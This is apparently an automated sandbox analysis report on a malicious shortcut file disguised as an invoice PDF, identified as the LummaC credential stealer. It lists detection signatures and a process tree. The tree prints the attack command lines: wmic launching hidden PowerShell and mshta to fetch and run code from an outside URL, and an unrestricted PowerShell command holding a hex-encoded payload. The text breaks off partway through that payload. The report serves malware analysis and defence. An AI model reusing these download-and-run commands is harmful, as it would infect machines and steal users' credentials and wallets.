Edit tour
Windows
Analysis Report
Rechnung736258.pdf.lnk
Overview
General Information
Detection
LummaC
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected AntiVM3
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to create processes via WMI
Creates processes via WMI
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects code into the Windows Explorer (explorer.exe)
LummaC encrypted strings found
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara detected Keylogger Generic
Classification
- System is w10x64
- WMIC.exe (PID: 2668 cmdline:
"C:\Window s\System32 \Wbem\wmic .exe" proc ess call c reate "pow ershell -w 1 . \W*\S *2\m*ht*e https://di mitricostr uzioni.ch/ documentco mplie" MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 6648 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4592 cmdline:
powershell -w 1 . \W *\S*2\m*ht *e https:/ /dimitrico struzioni. ch/documen tcomplie MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6472 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - mshta.exe (PID: 5832 cmdline:
"C:\Window s\System32 \mshta.exe " https:// dimitricos truzioni.c h/document complie MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 3396 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop $dd g = '0A4F0 4B664291D3 C891EE57CF 9AA6E0A237 52FE985FC9 FD64BB3465 A7D797346A C4EB8E6FA6 258E6C499D 05779F61BC EC012DC00D A9FBBDBA93 7EA0E7F819 DA30D62269 59EA751938 0176563334 C188B79BB6 DA507B41F9 479C4ECD6F CFBEAC8994 5BB235377D AFFC2B2E04 22A373DF64 E2DDF535FA 76F2F6195E DE596B0317 D480478602 7E0B623BF5 D1D584D606 5AFA5E42CE 963A461490 3389786638 A13BFEAD5B CA6D5632E9 6589B38912 10B8EE6577 C079CDE437 E55F527D85 1A6E360A41 5EC287B6A3 55E4474FF7 AFFC5E1C2C 84DF35ED48 39335D434B 4C6EB3E0E9 BE4C9BB602 4469302380 5DB66378A1 7C37A948E7 A51FC5D87A 0BC7A2EB7D 9F4DA15662 3A9183F872 D54778974A DE95F381DE 2AAE416E61 72BAAEF232 0C24A65879 A0D52DAD6F AF25F6401B A3456E99B3 F0C534868B B75527DBE1 0715FC36A8 BB44C99773 66FA95D0EE 4ADCEA23B7 1915BE1B53 B87D12D50B 68707404AE FB59E47D77 4511900EB4 509210E154 24197DEDAD BF6270B4BB DB7CA28491 995A87F9A3 CB9FC232BF B8DD6FC010 D911FB9A85 D8D423DDB3 D610F88D03 1C25B6AAAA 7F6F7E8677 3457EBF9E1 627E87A801 B0A5F69AB2 8A75F7A768 4E8E08FBD6 22656F168B 01419A0F91 42A0B1E96F 0A4019AC5A E6015EC400 D4957D3658 DA911E88F2 9E506EE2B3 15649007D4 AD02B9AC42 C6536DF21C 03BA8A4513 A3E4C54724 6C363F281F 230A226EA7 FEAF529327 52BB3E5AC1 DC92E54264 FDEEC820E4 60FF5BF265 D1D5A1A735 7FCC07BBCB 15D0DFC7AF B18D7D8ED8 D11813ABE2 565BCF731F 20AB1D1A8D 393D9E8CCA 5D1AC1297C E33468EA8F EA4B579AC4 DBD4338C86 D8207ED148 5FEA355E9C E074FCF496 ED4D2CEAAF FBF6FE7CD3 14D30A0CF1 CA039AA1ED C0440C8C08 2BBC07A345 8CB8039EB5 99B8C59B1E EAE0186F37 1C0B858E49 5C81E31038 1A10B00AA9 41D672D8F0 FDD94D6BCF 6344EA8D3C F3BE07A0F2 9AD3BC172F 5FEC0541A7 7B8007A0BA 0BA5CD1429 8C1D74F200 A847C8A858 6EDAF36D5C 8040A3D244 982700F4E5 95857B0619 867A217F8F EEAE91B337 EF24487158 0E0CEC7EC3 5A6E5C5356 234C447A13 CF21B5B3DC AF3D5A547E 32FB972AE6 DDFDA3C0C7 198771CA4D 327A77575F 82B079A6BC E811999F9A A1DBCBBA29 38F34BE32E ADA581AB69 F8BC451713 EC828E6D3D 62F721EB09 FC154CB3D9 3C7D958C9F 426B244650 B32A5CDBBF 9F9512F074 96C1DA9AED 38876CC794 D207359434 2E5E9B7E85 1A0C3AE911 98802506F7 FE48D8430B C5E4C06506 680E3D7613 B81E01A16C FD52474126 9AADD19A2E 1CF4A2BA75 CF3B27D0B2 A2C19729DE F1BAA021F0 0A33B6CBCB 211F0D14BB 0D6FDB116A C0D76B7EB1 4848CA0F71 871993F73D 63256F5FA9 4A2FAC6811 86693CF2F3 776C5B0D8C 1FD35E87EF 9FD6CC7633 C06DD2ECB5 AE82A9FDCE 2BB6DA99DB 57E009DCDE 40871998B8 FDCCD59411 335EB4B916 E81193A277 06177634DA 7F7994FB1D D6A944AC9D AECDCA2D45 C883E465AC 6BC3613FFF E963C92F84 B60C9183D5 22E4985734 4D0E0171A1 B4AF1FBF07 286E4C23EC 443EFA2CAA B4BEBF411F BE1E479929 2B05548811 AD68EC5054 67241E859F A3DD71727E 100C7C6F86 6465972504 3526B66756 D766159724 7';functio n vyt ($fF